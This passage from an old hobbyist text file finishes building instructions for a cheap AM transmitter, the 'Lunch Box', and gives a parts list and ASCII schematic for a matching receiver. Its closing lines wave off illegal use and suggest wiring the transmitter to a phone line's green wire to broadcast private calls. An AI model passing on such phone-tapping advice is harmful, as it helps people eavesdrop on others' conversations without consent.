  3429. You use the variable capacitor to adjust what freq. you want to
  3430. use. Find a good unused freq. down at the lower end of the scale
  3431. and you're set. Use the 2 meg pot. to adjust gain. Just screw
  3432. with it until you get what sounds good. The switch  on the 2meg
  3433. is for turning the Lunch Box on and off. When everything is
  3434. adjusted, turn on an AM radio adjust it to where you think the
  3435. signal is. Have  a friend say something thru the Box and tune in
  3436. to it. That's all there is to  it. The plans for a simple
  3437. receiver are shown below: 
  3438. 9 volt battery with battery clip
  3439. 365 pf variable capacitor
  3440. 51 pf capacitor
  3441. 1N38B diode
  3442. Transistor antenna coil
  3443. 2N366 transistor
  3444. SPST toggle switch
  3445. 1k to 2k magnetic earphone
  3446.  
  3447. Schematic for receiver
  3448.  
  3449.          [!]
  3450.           !
  3451.         51 pf
  3452.           !
  3453.      +----+----+
  3454.      !         !
  3455.      )       365 pf
  3456.      (----+    !
  3457.      )    !    !
  3458.      +---------+---GND
  3459.           !
  3460.           +---*>!----base  collector-----
  3461. [             diode      2N366           earphone
  3462.                         emitter    +-----
  3463.                           !        !
  3464.                          GND       !
  3465.                                    -
  3466.                                    +
  3467.                                    - battery
  3468.                                    +
  3469.            GND------>/<------------+
  3470.                   switch
  3471.  
  3472.  
  3473.   Closing statement
  3474. This two devices can be built for under total of $10.00. Not too
  3475. bad. Using these devices in illegal ways is your option. If you
  3476. get caught, I accept NO responsibility for your actions. This can
  3477. be a lot of fun if used correctly. Hook it up to the green wire
  3478. (I think) on the phone line and it will send the conversation
  3479. over the air waves.
  3480. -- 
  3481. Daniel    N2SXX
  3482.   dmd@panix.com
  3483.